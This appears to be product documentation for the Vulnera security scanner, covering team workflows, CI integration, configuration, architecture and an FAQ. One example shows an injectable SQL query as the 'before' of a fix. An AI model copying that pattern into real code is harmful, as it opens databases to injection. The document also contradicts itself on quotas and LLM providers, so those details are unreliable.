    • Invite security lead with Admin role (manage integrations, settings)
    • Invite executives with Viewer role (read-only access to reports)
  3. Set Up Shared Quota

    • Organization gets shared token pool (e.g., 1000 tokens/month for Pro)
    • All members draw from same pool
    • No individual limits unless configured (Enterprise)
  4. Enable Notifications

    • Settings → Integrations → Slack
    • Connect team Slack workspace
    • Enable daily summary and critical finding alerts
    • All members get notifications in shared channel

Scan Coordination

Multi-stage scanning workflow:

Developer creates scan
         ↓
Scan runs (uses shared quota)
         ↓
Results available to all members
         ↓
Security team reviews findings
         ↓
Developer addresses findings
         ↓
Findings marked resolved
         ↓
Historical record kept for audit

Practical Example:

  1. Developer Alice runs scan on /backend:

    vulnera auth login --api-key $ORG_API_KEY  # (org key, not personal)
    vulnera analyze ./backend --all-modules
    
  2. Security lead Bob reviews findings in dashboard:

    • Open scan → Filter by Critical/High severity
    • Add comments to findings
    • Mark false positives
    • Create Jira tickets for issues
  3. Developer Alice gets Slack notification:

    • “New critical finding in backend scan”
    • She clicks link → opens dashboard
    • Sees Bob’s comments and tickets
    • Fixes code locally
  4. Alice re-runs scan after fix:

    • Same findings now show as “Resolved”
    • Historical comparison shows before/after

Code Review Integration

GitHub PR workflow with Vulnera:

  1. Setup GitHub Integration (Admin):

    • Settings → Integrations → GitHub
    • Authorize Vulnera app
    • Enable “Auto-scan PRs”
  2. Developer opens PR:

    • GitHub automatically triggers Vulnera scan
    • Results appear as PR status check
  3. Security review:

    • PR blocked if critical issues found
    • Vulnera comment on PR with findings
    • Link to full dashboard for details
    • Developer can request security review
  4. Resolution:

    • Developer pushes fix commit
    • Vulnera automatically re-scans
    • If clean, PR check passes
    • Can now merge to main

Example GitHub PR Comment:

🚨 Vulnera Security Scan Found Issues

Critical (1):
- SQL Injection in /src/api/users.py:45
  CVSS: 9.2

High (2):
- Hardcoded API key in config.py:12
- Missing input validation in POST /api/data:78

View full report: [Dashboard Link]
Bot action: This PR is blocked until issues are resolved

Finding Management

Assigning Findings

Assign to Team Member:

  1. Open scan → select finding
  2. Click Assign To
  3. Search member by email or name
  4. Member gets notification:
    • Email: “You’ve been assigned a critical finding”
    • Slack: Link to finding with severity
    • In-app: Shows in “Assigned to Me” queue

My Assignments View:

  • Dashboard → My Assignments
  • Shows all findings assigned to current member
  • Sort by severity, due date, project
  • Quick filter: Unstarted, In Progress, Blocked

Tracking Remediation

Finding Status Lifecycle:

Open (New)
    ↓
In Progress (assigned, work started)
    ↓
Resolved (fix implemented, verified)
OR
False Positive (not a real issue)
OR
Acknowledged (known issue, accepting risk)

Updating Status:

  1. Open finding → Status dropdown

  2. Select new status

  3. Add comment (optional):

    • Explain why marked false positive
    • Link to fix PR or commit
    • Document risk acceptance
  4. Members with access see update:

    • Slack notification: “@alice marked as Resolved”
    • Audit log records change
    • Dashboard updates in real-time

Commenting & Discussion

Collaborate on Finding:

  1. Open finding → scroll to Discussion section
  2. Click Add Comment
  3. Type message (Markdown supported)
  4. @mention team members: @bob or @security-team
  5. Submit → all mentioned members notified

Example Finding Discussion:

Alice: "This is a security issue in our OAuth implementation"

Bob: "Good catch. I'll check if this affects production"

Charlie: "@bob let's verify in staging first"

Security Lead: "Approved for resolution. PR: #4521"

Threaded Discussions (Enterprise):

  • Reply to specific comments
  • Resolve/pin important threads
  • Export discussion for compliance

Reporting & Analytics

Team Analytics Dashboard

Organization Analytics (Admin view):

Go to Settings → Analytics → Dashboard

View:

  • Team quota usage (bar chart: 850/1000 tokens used)
  • Usage by member (table: Alice 400 tokens, Bob 300, etc.)
  • Usage by module (pie: Dependencies 50%, SAST 35%, Secrets 15%)
  • Trend (line graph: last 6 months)
  • Busiest project, most findings by type

Shared Reports

Generate Report for Stakeholders:

  1. Go to Reports → New Report
  2. Select report type:
    • Executive Summary — High-level metrics for leadership
    • Detailed Technical — Full findings for security team
    • Compliance — SOC2/ISO27001/GDPR aligned
    • Department Summary — Findings by team/project
  3. Configure:
    • Date range (last 30 days, last quarter, custom)
    • Modules to include (dependencies, SAST, secrets, API)
    • Recipients (email, download, or both)
  4. Click Generate
  5. Share PDF/HTML with stakeholders

Executive Summary Example:

VULNERA SECURITY REPORT
January 2024

OVERVIEW
Total Vulnerabilities: 247
Critical: 12  |  High: 45  |  Medium: 120  |  Low: 70

TRENDS
↓ 15% fewer critical issues vs. last month
→ Secrets detection improved (5 leaked credentials caught)
↑ Dependencies increased (new packages added)

TEAM PERFORMANCE
Alice: 42 scans, 340 findings reviewed
Bob: 38 scans, 280 findings reviewed
Charlie: 25 scans, 180 findings reviewed

NEXT STEPS
1. Remediate 5 critical issues (ongoing)
2. Update 12 outdated dependencies (in progress)
3. Add 2 new team members for code review capacity

Custom Dashboards (Enterprise)

Create personalized views:

  1. Go to Organization → Dashboards → Custom
  2. Select widgets:
    • Recent findings
    • Team quota gauge
    • Trend chart
    • Member activity
    • CI/CD integration status
  3. Arrange layout, save as team dashboard
  4. Share with team members

Security Team Workflows

Daily Security Review Routine

Morning (15 min):

  1. Check Slack for critical findings overnight
  2. Review My Assignments dashboard
  3. Prioritize by severity and project criticality

Mid-day (30 min):

  1. Comment on findings with remediation guidance
  2. Assign new findings to developers
  3. Update status on resolved items

End-of-day (10 min):

  1. Generate daily summary report
  2. Check team quota usage (alert if >75%)
  3. Review newly integrated repositories

Weekly (1 hour):

  1. All-hands meeting: review weekly findings summary
  2. Discuss high-priority remediation blockers
  3. Plan integrations/automation improvements

Escalation Process

When to escalate finding:

  1. Critical + No Owner Assigned → Assign to team lead immediately
  2. Finding unresolved 7+ days → Escalate to manager
  3. Multiple critical findings in same code → Schedule code review session
  4. Suspicious pattern (e.g., many secrets) → Notify CISO

Escalation in Dashboard:

  1. Open finding → Mark Escalated
  2. Add reason:
    • High business impact
    • Unresponsive team
    • Need architecture review
  3. Escalated findings show in red on analytics
  4. Leadership dashboard shows escalations count

Developer Workflows

Running Scans as Developer

Individual Contributor:

# Authenticate with org API key
vulnera auth login --api-key $ORG_API_KEY

# Scan your code (uses org quota, not personal)
vulnera analyze ./src --all-modules --format json

# View results (or use dashboard)
vulnera analyze ./src --all-modules --format sarif | jq '.findings[] | {location, message, severity}'

Pre-commit Scanning:

  1. Install hook:

    vulnera install-hook ./
    
  2. Hook runs before commit, blocks if critical:

    $ git commit
    Vulnera scan in progress...
    2 critical findings detected. Commit blocked.
    Fix and retry: git commit
    

CI/CD Integration:

In .github/workflows/security.yml:

name: Security Scan

on: [push, pull_request]

jobs:
  vulnera-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - name: Run Vulnera scan
        env:
          VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
        run: |
          curl -L https://releases.vulnera.studio/vulnera-linux-x86_64 -o vulnera
          chmod +x vulnera
          ./vulnera analyze . --all-modules --format sarif > vulnera.sarif

      - name: Upload SARIF to GitHub
        uses: github/codeql-action/upload-sarif@v2
        with:
          sarif_file: vulnera.sarif

Understanding & Fixing Findings

When you get assigned a finding:

  1. Notification (Slack, email, dashboard)

    • Click link → opens finding details
  2. Understand the Issue

    • Read vulnerability explanation
    • Look at affected code snippet
    • Review CVSS score and severity
    • Check provided remediation guidance
  3. Research if Needed

    • Follow linked CVE/CWE
    • Check if it affects your use case
    • Ask security team for context (@bob in dashboard)
  4. Fix or Dismiss

    • If real issue: Create fix branch, implement patch, commit
    • If false positive: Mark as such in dashboard with reason
    • If acceptable risk: Mark as “Acknowledged” (with manager approval)
  5. Verify

    • Re-run scan locally: vulnera analyze ./
    • Finding should disappear or show as resolved
    • Create PR with fix
    • Vulnera auto-scans PR → shows as clean
  6. Mark Complete

    • PR merged → Vulnera marks finding resolved
    • Or manually: Dashboard → Finding → Status → Resolved

Example Finding Workflow:

Finding: SQL Injection in /api/users.py:45
Severity: Critical
CVSS: 9.2

Developer reads:
"User input is concatenated directly into SQL query without parameterization"

Developer fixes:
```python
# Before
query = f"SELECT * FROM users WHERE id = {user_id}"

# After
query = "SELECT * FROM users WHERE id = $1"
db.execute(query, [user_id])

Developer re-scans → Finding gone → PR merged

Dashboard shows: “Resolved by commit abc123def”


## Cross-Team Collaboration

### Developer + Security Team

**Weekly Sync Meeting:**

1. **Agenda** (30 min):
   - Review critical findings from past week
   - Discuss blockers (unclear requirements, false positives)
   - Prioritize next week's work
   - Demo fixes and improvements

2. **Before Meeting**:
   - Security team prepares findings summary (generated report)
   - Developers review assigned items in dashboard
   - Both teams note questions

3. **After Meeting**:
   - Document decisions in dashboard comments
   - Update remediation timeline
   - Send summary email to stakeholders

### DevOps + Security Team

**Infrastructure Scanning:**

1. **DevOps** sets up cloud scanning:
   ```bash
   vulnera analyze s3://our-bucket --all-modules
   vulnera analyze github-repos --org acme-corp --all-modules
  1. Security reviews infrastructure findings:

    • Cloud misconfigurations
    • Exposed credentials in configs
    • Vulnerable dependencies in infra code
  2. DevOps fixes issues:

    • Updates IaC templates (Terraform, CloudFormation)
    • Re-scans to verify
    • Dashboards show infrastructure security posture

Security Team + Leadership

Monthly Executive Report:

  1. Generate Compliance Report:

    • Go to Reports → Compliance Reports → SOC2
    • Select past month
    • Download PDF
  2. Include in Board Deck:

    • Overview of findings trend
    • Team remediation velocity
    • Risk metrics and KPIs
    • Budget/quota efficiency
  3. Dashboard Access for Leadership:

    • Create Viewer accounts for executives
    • Give read-only access to reports
    • They can view trends without modifying findings

Notifications & Alerts

Configuring Team Notifications

Central Configuration (Admin):

  1. Go to Settings → Notifications
  2. Set for entire team:
    • Critical findings: Immediate Slack alert
    • High findings: Daily digest email
    • Quota alerts: At 75%, 90%, 100%
    • Member activity: Weekly summary

Personal Preferences (Member):

  1. Go to Profile → Notification Preferences
  2. Member can override:
    • Frequency (real-time, daily digest, weekly summary)
    • Channel (email, Slack, in-app, SMS)
    • Finding types (all, critical only, assigned only)

Slack Channel Strategy

Setup Channels:

  • #vulnera-critical — Real-time critical findings (mention team lead)
  • #vulnera-security — All findings, daily summary (team discussion)
  • #vulnera-alerts — Quota warnings, integration issues (ops only)
  • #vulnera-ci — PR scan results, CI/CD integration logs (read-only bot)

Slack Automation Example:

@vulnera-bot configure
├── #vulnera-critical: severity >= critical
├── #vulnera-security: summary daily 9 AM
├── #vulnera-alerts: quota > 90%
└── #vulnera-ci: all GitHub PR scans

Performance Metrics

Key Metrics to Track

Team Health:

  • Remediation Rate — % of findings fixed within SLA
  • Mean Time to Remediation (MTTR) — Days from finding to resolved
  • False Positive Rate — % of dismissed as not real issue
  • Scan Frequency — Scans per week by team

Security Posture:

  • Critical Findings Trend — Month-over-month comparison
  • Dependency Age — Average age of dependencies
  • Secret Exposures — Count of exposed credentials (should be zero)
  • Coverage — % of repositories being scanned

Quota Efficiency:

  • Tokens/Finding — Cost per vulnerability found
  • Scans/Token — How many scans per token used
  • Team Quota Burndown — Days until month-end quota exhausted

Monthly Review Template

Run this monthly:

  1. Export analytics report (Settings → Analytics → Export)
  2. Calculate metrics above
  3. Create 1-page summary:
    • Headline: metrics vs. last month
    • Key wins: critical issues resolved
    • Blockers: findings taking too long
    • Next month priorities
  4. Share with team + leadership

Best Practices

Team Organization

Small Team (5 members):

  • 1 Security lead (Admin)
  • 4 Developers (Members)
  • Shared single quota pool
  • Daily Slack updates

Medium Team (15 members):

  • 1-2 Security leads (Admin)
  • 10-12 Developers (Member)
  • 2-3 Managers (Viewer)
  • Department-specific Slack channels

Large Organization (50+ members):

  • Hierarchical teams (Enterprise)
  • Custom RBAC roles
  • Department quotas
  • Cross-team steering committee

Communication Best Practices

Do:

  • Comment on findings with context (not just “fix this”)
  • Mention developers in Slack for urgent issues
  • Have weekly syncs (async updates via dashboard)
  • Document decisions in finding comments
  • Celebrate resolved critical findings

Don’t:

  • Assign findings without explanation
  • Ignore escalated issues
  • Let findings sit unreviewed >5 days
  • Resolve without verification
  • Skip audit log reviews

Security Practices

Do:

  • Use organization API keys, not personal keys
  • Rotate API keys quarterly
  • Enable 2FA for all members
  • Audit member list monthly
  • Export compliance reports quarterly
  • Review webhook logs

Don’t:

  • Share API keys in chat/email
  • Use shared email addresses
  • Keep inactive members in org
  • Disable audit logging
  • Store findings in plaintext
  • Ignore unreviewed scans

Common Scenarios

Scenario 1: Onboarding New Developer

  1. Admin invites developer with Member role
  2. Developer accepts invite
  3. DevOps provides org API key
  4. Developer authenticates: vulnera auth login --api-key
  5. Developer runs first scan: vulnera analyze ./
  6. Security team reviews findings, comments with guidance
  7. Developer receives Slack notification, fixes issues
  8. Next scan shows issues resolved

Timeline: 30 minutes total

Scenario 2: Critical Finding in Production Code

  1. Vulnera detects critical SQL injection in production branch
  2. Slack alert goes to #vulnera-critical (pings team lead)
  3. Security lead opens dashboard, verifies severity
  4. Security lead assigns to Alice (code owner) with comment: “URGENT: Fix before merge”
  5. Alice gets Slack notification, sees 9.2 CVSS score
  6. Alice creates hotfix branch, implements parameterized query
  7. Alice commits fix, GitHub auto-scans PR (Vulnera)
  8. Dashboard shows finding now marked “Resolved”
  9. Alice creates PR, security approves, code merged
  10. Production release includes fix

Timeline: 2-4 hours

Scenario 3: Monthly Compliance Reporting

  1. Security lead runs report: Reports → Compliance → SOC2 → January
  2. Report generated: PDF with audit log, member actions, findings summary
  3. Security lead emails report to CISO, board
  4. CISO reviews with dashboard (Viewer access)
  5. Sends to auditor for compliance verification

Timeline: 10 minutes to generate, 1 hour to review

Troubleshooting

Q: Team member not seeing organization scans

A: 1. Verify member accepted invitation (check email)
   2. Confirm member role is not Viewer
   3. Have member log out/log back in
   4. Clear browser cache
   5. Check if member was removed (Settings → Audit Log)

Q: Findings not appearing in Slack

A: 1. Verify Slack integration enabled (Settings → Integrations)
   2. Check notification triggers configured
   3. Verify Vulnera app still has channel permissions
   4. Test webhook: Settings → Webhooks → Test
   5. Check Slack app hasn't been uninstalled from workspace

Q: Team member assigned findings but didn’t respond

A: 1. Verify notification settings (Settings → Notifications)
   2. Member may have disabled email notifications
   3. Send direct Slack message if urgent
   4. Escalate to manager if blocking
   5. Consider reassigning if no response in 3 days

Q: How to handle team member leaving?

A: 1. Remove member (Settings → Members → Remove)
   2. Revoke their API keys immediately
   3. Reassign their open findings to other members
   4. Export their scan history (for audit/compliance)
   5. Review audit log for any suspicious activity

Next Steps

  • Set Up Slack — Enable real-time alerts for your team
  • Create Weekly Sync — Calendar recurring meeting to review findings
  • Generate First Report — Monthly compliance or executive summary
  • Document Workflows — Create team runbook for common scenarios

For dashboard features, see Dashboard Guide. For organization setup, see Organization Management.


Need help? Email support@vulnera.studio or visit our FAQ.

Configuration Reference

This page documents all configuration options for Vulnera.

Environment Variables

All configuration can be set via environment variables with the VULNERA__ prefix using double underscores for nesting.


Core Settings

VariableDescriptionDefault
DATABASE_URLPostgreSQL connection stringRequired
VULNERA__AUTH__JWT_SECRETJWT signing secret (32+ chars)Required
VULNERA__SERVER__ADDRESSServer bind address0.0.0.0:3000
VULNERA__SERVER__ENABLE_DOCSEnable Swagger UItrue

LLM Configuration

Vulnera supports multiple LLM providers for AI-powered features.

Provider Selection

VariableDescriptionDefault
VULNERA__LLM__PROVIDERActive provider: google_ai, openai, azuregoogle_ai
VULNERA__LLM__DEFAULT_MODELModel name for generationgemini-2.0-flash
VULNERA__LLM__TEMPERATUREGeneration temperature (0.0-1.0)0.3
VULNERA__LLM__MAX_TOKENSMaximum tokens to generate2048
VULNERA__LLM__TIMEOUT_SECONDSRequest timeout60
VULNERA__LLM__ENABLE_STREAMINGEnable streaming responsestrue

Google AI (Gemini)

VariableDescription
GOOGLE_AI_KEYAPI key from aistudio.google.com
VULNERA__LLM__GOOGLE_AI__BASE_URLCustom API endpoint

Recommended models: gemini-2.0-flash, gemini-1.5-pro

OpenAI

VariableDescription
OPENAI_API_KEYAPI key from platform.openai.com
VULNERA__LLM__OPENAI__BASE_URLCustom endpoint (for Ollama, vLLM, etc.)
VULNERA__LLM__OPENAI__ORGANIZATION_IDOrganization ID

Recommended models: gpt-4, gpt-4-turbo, gpt-3.5-turbo

Azure OpenAI

VariableDescription
AZURE_OPENAI_KEYAzure API key
VULNERA__LLM__AZURE__ENDPOINTAzure resource endpoint
VULNERA__LLM__AZURE__DEPLOYMENTDeployment name
VULNERA__LLM__AZURE__API_VERSIONAPI version (default: 2024-02-15-preview)

Resilience Settings

VariableDescriptionDefault
VULNERA__LLM__RESILIENCE__ENABLEDEnable circuit breaker + retrytrue
VULNERA__LLM__RESILIENCE__MAX_RETRIESMax retry attempts3
VULNERA__LLM__RESILIENCE__INITIAL_BACKOFF_MSInitial backoff delay500
VULNERA__LLM__RESILIENCE__MAX_BACKOFF_MSMaximum backoff delay30000
VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_THRESHOLDFailures before circuit opens5
VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_TIMEOUT_SECSSeconds before circuit recovery60

Enrichment Settings

VariableDescriptionDefault
VULNERA__LLM__ENRICHMENT__MAX_FINDINGS_TO_ENRICHMax findings to enrich10
VULNERA__LLM__ENRICHMENT__MAX_CONCURRENT_ENRICHMENTSConcurrent enrichment calls3
VULNERA__LLM__ENRICHMENT__INCLUDE_CODE_CONTEXTInclude code in promptstrue
VULNERA__LLM__ENRICHMENT__MAX_CODE_CONTEXT_CHARSMax code snippet length2000

Sandbox Configuration

The sandbox provides secure isolation for SAST and secrets detection modules.

VariableDescriptionDefault
VULNERA__SANDBOX__ENABLEDEnable sandboxingtrue
VULNERA__SANDBOX__BACKENDSandbox backend (see below)landlock
VULNERA__SANDBOX__FAILURE_MODESandbox setup behaviorbest_effort
VULNERA__SANDBOX__EXECUTION_TIMEOUT_SECSExecution timeout30
VULNERA__SANDBOX__MEMORY_LIMIT_MBMemory limit (process backend)256

Sandbox Backends

BackendDescriptionRequirements
landlockKernel-level isolationLinux 5.13+
autoAuto-detect best backendLinux/non-Linux
processFork-based isolationAny Linux
noopDisable sandboxingNot recommended

Landlock provides near-zero overhead security using Linux kernel capabilities.

Failure modes:

ModeBehavior
best_effortContinue analysis if sandbox setup degrades
fail_closedAbort module execution if sandbox setup fails

Cache Configuration

VariableDescriptionDefault
VULNERA__CACHE__DRAGONFLY_URLRedis/Dragonfly URLOptional
VULNERA__CACHE__DEFAULT_TTL_SECSDefault cache TTL3600

Example Configuration

Minimal (Development)

DATABASE_URL='postgresql://localhost/vulnera'
VULNERA__AUTH__JWT_SECRET='dev-secret-key-at-least-32-chars!'
GOOGLE_AI_KEY='your-api-key'

Production

DATABASE_URL='postgresql://user:pass@db.example.com:5432/vulnera'
VULNERA__AUTH__JWT_SECRET='production-secret-minimum-32-chars!'
VULNERA__CACHE__DRAGONFLY_URL='redis://cache.example.com:6379'

# LLM
VULNERA__LLM__PROVIDER='google_ai'
GOOGLE_AI_KEY='your-production-key'
VULNERA__LLM__RESILIENCE__ENABLED=true

# Sandbox
VULNERA__SANDBOX__ENABLED=true
VULNERA__SANDBOX__BACKEND='landlock'
VULNERA__SANDBOX__FAILURE_MODE='best_effort'

# Server
VULNERA__SERVER__ENABLE_DOCS=false
VULNERA__SERVER__CORS_ORIGINS='https://vulnera.studio'

System Architecture (Advanced Reference)

This section provides technical details about Vulnera’s architecture for developers, integrators, and operators who need deeper understanding.

Overview

Vulnera is a modular, async Rust platform using domain-driven design (DDD) principles with a composition root wiring pattern.

┌─────────────────────────────────────────────────────────────┐
│                        HTTP Server                           │
│                   (Axum Web Framework)                       │
└──────────────────────────┬──────────────────────────────────┘
                           │
┌──────────────────────────┴──────────────────────────────────┐
│                    Orchestrator                              │
│        (Async Job Queue + Module Registry)                   │
├───────────────┬──────────────┬─────────────┬────────────────┤
│               │              │             │                │
▼               ▼              ▼             ▼                ▼
Dependencies  SAST         Secrets        API            LLM
Analysis      Analysis     Detection     Analysis       Explanations
(Node deps)   (AST rules)  (ML models)   (OpenAPI)      (Pangu)

Layered Architecture

Vulnera follows domain-driven design with four layers:

1. Domain Layer

Pure types, entities, traits—zero side effects

  • module.rsAnalysisModule trait (all modules implement)
  • errors.rs — Domain error types
  • findings.rs — Finding entity and value objects
  • config.rs — Configuration value objects
  • repository.rs — Repository trait definitions

Key traits:

  • AnalysisModule — All modules (deps, SAST, secrets, API, LLM) implement this
  • IRepository — Abstract data access
  • ICache — Cache abstraction (Dragonfly/Redis only)
  • IAuthenticator — Authentication logic

2. Application Layer

Use cases orchestrating domain logic

  • create_analysis_job.rs — Initialize analysis job
  • execute_analysis_job.rs — Run analysis modules
  • enrich_findings_with_llm.rs — Add LLM explanations
  • Repository implementations for data access

Key characteristics:

  • Specific use cases (business logic)
  • Coordinates between domain and infrastructure
  • Returns domain entities (not DTOs)

3. Infrastructure Layer

HTTP clients, database queries, file I/O, parsers

  • database/ — SQLx compile-time validated SQL queries
  • parsers/ — AST parsing, manifest parsers
  • api_clients/ — NVD, GHSA, GitHub, Pangu LLM clients
  • cache/ — Dragonfly/Redis caching, compression
  • auth/ — JWT and API key handling

Key characteristics:

  • All external communication
  • Wrapped with circuit breakers and retry logic
  • Configurable via Config struct

4. Presentation Layer

Controllers, routes, DTOs

  • controllers/ — HTTP handlers
  • models.rs — Request/response DTOs with OpenAPI annotations
  • routes.rs — Route registration

Module System

The Five Analysis Modules

Each implements AnalysisModule trait:

  1. Dependencies — Package registry lookups (OSV, NVD, GHSA)
  2. SAST — AST-based code analysis (tree-sitter)
  3. Secrets — ML pattern + entropy detection
  4. API — OpenAPI 3.x specification analysis
  5. LLM — Google Gemini API for explanations/fixes

Module Selection (Rule-Based)

Input: /path/to/project
  ├─ package.json found → Run Dependencies
  ├─ .py/.js files found → Run SAST (language-specific)
  ├─ All files scanned → Run Secrets
  ├─ openapi.yaml found → Run API
  └─ All findings → Optionally enrich with LLM

Data Flow: Full Analysis Job

HTTP POST /api/v1/analyze/job
  │
  ├─→ [Auth middleware] ← Validate API key or JWT
  │
  ├─→ [Rate limiter] ← Check quota (token-based)
  │
  ├─→ [Create job use case]
  │   ├─ Validate input
  │   ├─ Create Job in database
  │   └─ Push to Dragonfly job queue
  │
  ├─→ [Worker pool] (async, configurable max_job_workers)
  │   ├─ Dequeue job
  │   ├─ Download/access source (git, S3, local)
  │   ├─ Detect project type → Module selector
  │   ├─ Run selected modules in parallel
  │   │   ├─ Dependencies: concurrent registry lookups
  │   │   ├─ SAST: concurrent file analysis
  │   │   ├─ Secrets: concurrent file scanning
  │   │   └─ API: parse OpenAPI spec
  │   ├─ Aggregate findings
  │   └─ Persist to database
  │
  └─→ Return: Job ID + status (or stream if still processing)

Concurrency Model

Tokio async runtime with configurable thread pools:

[analysis]
max_job_workers = 8              # Worker pool size
max_concurrent_packages = 8       # Per-job package lookups
max_concurrent_registry_queries = 10
max_concurrent_api_calls = 12

Concurrency impact:

  • Without concurrency: 50 packages → 50 × 2s = 100 seconds
  • With 8 concurrent workers: 50 packages → 6-12 seconds
  • With caching: 50 packages (50% cached) → 3-6 seconds

Cache Architecture

Two-level caching with Dragonfly/Redis:

L1: In-Memory (100MB, 5-min TTL, optional compression)
      ↓ (miss)
L2: Dragonfly/Redis (24-hour TTL, 10KB compression threshold)
      ↓ (miss)
External: OSV, NVD, GHSA, GitHub, Pangu LLM APIs

Configuration:

[cache]
ttl_hours = 24
l1_cache_size_mb = 100
l1_cache_ttl_seconds = 300
enable_cache_compression = true
compression_threshold_bytes = 10240
dragonfly_url = "redis://127.0.0.1:6379"

Rate Limiting & Quota System

Token-based quota with Dragonfly backend:

GET request:          1 token
POST request:         2 tokens
Analysis operation:   3 tokens
LLM operation:        6 tokens

Tiers:

  • Unauthenticated: 10 tokens/day
  • API Key: 40 tokens/day
  • Organization: 48 tokens/day (shared)

Daily reset: UTC midnight

Database Schema

PostgreSQL 12+ with SQLx compile-time validation:

Key tables:

  • users — User accounts, authentication
  • organizations — Team/organization grouping
  • organization_members — Role-based membership
  • persisted_job_results — Analysis findings (JSONB)
  • api_keys — SHA256-hashed API keys
  • subscription_limits — Quota tracking

Authentication & Authorization

JWT Flow

  1. User registers/logs in → JWT issued (httpOnly cookie)
  2. Middleware extracts JWT on each request
  3. Validates signature + expiry
  4. Injects user context into request

API Key Flow

  1. User creates API key → Returns one-time (never shown again)
  2. Stored as SHA256 hash in database
  3. Each request: Lookup hash, verify, use associated user

RBAC (Role-Based Access Control)

  • Owner: Full access, billing, member management
  • Admin: Create jobs, manage members, view analytics
  • Analyst: Create jobs, view results, comment
  • Viewer: View-only access

Security Model

Defense in depth:

  1. HTTPS + HSTS
  2. CORS (configurable allowed_origins)
  3. CSRF tokens (POST/PUT/DELETE)
  4. Rate limiting (stricter for auth endpoints)
  5. Input validation (SQLx prevents SQL injection)
  6. Output encoding (JSON serialization)
  7. No secrets in logs (sensitive fields marked)

Configuration System

Strongly-typed with environment overrides:

config/default.toml (defaults)
         ↓
Environment variables (override)
         ↓
Config struct (passed to services)

Pattern: VULNERA__SECTION__KEY=value
Example: VULNERA__AUTH__JWT_SECRET=mysecret

Composition Root

Single entry point: src/app.rs

All services instantiated and wired:

1. Load config
2. Connect to external services (DB, cache, APIs)
3. Instantiate analysis modules
4. Register modules in ModuleRegistry
5. Spawn worker pool
6. Return OrchestratorState (passed to handlers)

Key principle: Never instantiate services inside module internals. Everything flows through OrchestratorState.

Performance Characteristics

Analysis speed (typical):

ModuleTimeDepends On
Secrets100ms/fileFile size
SAST500ms/fileFile complexity
API50ms/specSpec size
Dependencies1-10s/packageRegistry latency
LLM1-5s/requestPangu API latency

Deployment Models

Docker

FROM rust:1.91 AS builder
# Build Vulnera binary...

FROM debian:bookworm
COPY --from=builder /vulnera /usr/bin/
EXPOSE 3000
CMD ["vulnera"]

Kubernetes

  • Stateless API servers (replicate horizontally)
  • Shared PostgreSQL database
  • Shared Dragonfly cache
  • Shared job queue (Dragonfly)

Scaling Considerations

Horizontal: Add API server instances behind load balancer (all stateless)

Vertical: Tune max_job_workers and max_concurrent_* settings

Resource limits:

  • Memory: ~500MB base + job-dependent (~100MB per concurrent job)
  • CPU: Event-driven, peaks during concurrent analysis
  • Disk: Cache compression reduces storage

For More Information

Orchestrator Observability Architecture

This document defines the observability architecture for the orchestration pipeline from job creation through module execution and lifecycle persistence.

Goals

  • Make orchestration failures actionable in production.
  • Preserve request/job context across async boundaries.
  • Keep logging structured and queryable.
  • Minimize hidden failure modes in state transitions.

Scope

Applies to:

  • CreateAnalysisJobUseCase
  • ExecuteAnalysisJobUseCase
  • JobWorkflow
  • Worker execution path in job_queue

Design Principles

  1. Context at boundaries

    • Every public use-case/workflow entrypoint must emit structured context at start and finish.
    • Required identifiers: job_id, project_id, module, and transition target when applicable.
  2. Error locality

    • Failures should be logged as close as possible to their source with operation-specific metadata.
    • Callers should receive typed errors; logs carry operational detail.
  3. State-machine visibility

    • Every job transition (Pending -> Queued -> Running -> Completed/Failed/Cancelled) must be visible in logs with reason and timing.
  4. Async fan-out accountability

    • Parallel module execution logs should expose:
      • module spawn
      • module completion/failure
      • aggregate completion counts
  5. No panic paths in orchestration

    • Runtime errors should not panic in production paths.

Event Model

Job Lifecycle Events

  • job.lifecycle.enqueue
  • job.lifecycle.start
  • job.lifecycle.complete
  • job.lifecycle.fail
  • job.lifecycle.cancel

Suggested fields:

  • job_id
  • project_id
  • status_from
  • status_to
  • reason
  • duration_ms (where applicable)

Module Execution Events

  • job.module.spawn
  • job.module.complete
  • job.module.error
  • job.module.panic (unexpected task panic)

Suggested fields:

  • job_id
  • module
  • duration_ms
  • error

Instrumentation Strategy

  • Use #[instrument] on public async orchestration methods.
  • Use info for lifecycle milestones.
  • Use warn for degraded-but-continued paths.
  • Use error for failed operations and panics.
  • Include elapsed timing at operation boundaries for coarse latency tracking.

Operational Outcomes

With this architecture, operators can answer:

  • Which phase is failing most often?
  • Which module frequently exceeds expected runtime?
  • Which jobs failed due to transition/persistence errors vs module logic?
  • How long jobs spend in each phase.

Future Extensions

  • Export spans to OpenTelemetry collector.
  • Add metrics counters/histograms aligned with event model.
  • Correlate webhook delivery outcomes with lifecycle events.

Frequently Asked Questions (FAQ)

Quick answers to common questions about Vulnera’s features, capabilities, and usage.

Quota & Rate Limiting

How much does analysis cost in tokens?

Each operation consumes tokens from your daily quota:

OperationCost
Basic analysis3 tokens
LLM explanation6 tokens
Code fix generation6 tokens
LLM query6 tokens

Example: A full analysis (3) + 2 LLM features (12) = 15 tokens total.

Reference: Quota & Pricing Guide

What’s the difference between API key tier and organization tier?

TierDaily LimitUse Case
Unauthenticated10 tokensTesting, no auth
API Key40 tokensSingle integration
Organization48 tokensTeam usage, shared quota

Team quota pools together: If an org has 5 members, all members share the 48-token daily limit (no per-member quota).

Can I increase my quota?

Yes. Options:

  1. Organization tier — Upgrade to shared team quota (100 tokens/day)
  2. Premium plan — Contact vulnera for higher limits
  3. On-premise — Deploy Vulnera privately with unlimited quota

What happens when I exceed my quota?

You receive a 429 Too Many Requests error:

Quota resets at 00:00 UTC every day.


Offline Capabilities

What can Vulnera analyze offline (without internet)?

ModuleOfflineNotes
SAST✅ YesAST pattern matching (Python, JS, Rust)
Secrets✅ YesML pattern recognition + entropy
API✅ YesOpenAPI schema analysis
Dependencies❌ NoRequires CVE database
LLM❌ NoRequires Pangu API

CLI offline scan:

vulnera analyze --source ./my-project --modules sast,secrets,api
# No internet required

Can I use Vulnera without an internet connection?

Partial. The CLI can run offline scans for SAST, Secrets, and API analysis. Dependency scanning requires internet (to fetch CVE data from registries).


Analysis Accuracy & False Positives

Why do I have false positives in secret detection?

Common causes:

  1. Test/example secrets — Hardcoded in docs or tests

    • Fix: Mark as .vulnera-ignore or use entropy baseline filters
  2. Placeholder values — Keys like YOUR_API_KEY_HERE

    • Fix: Entropy score filters exclude most placeholders
  3. High-entropy strings — Random tokens in logs

    • Fix: Configure entropy thresholds per secret type

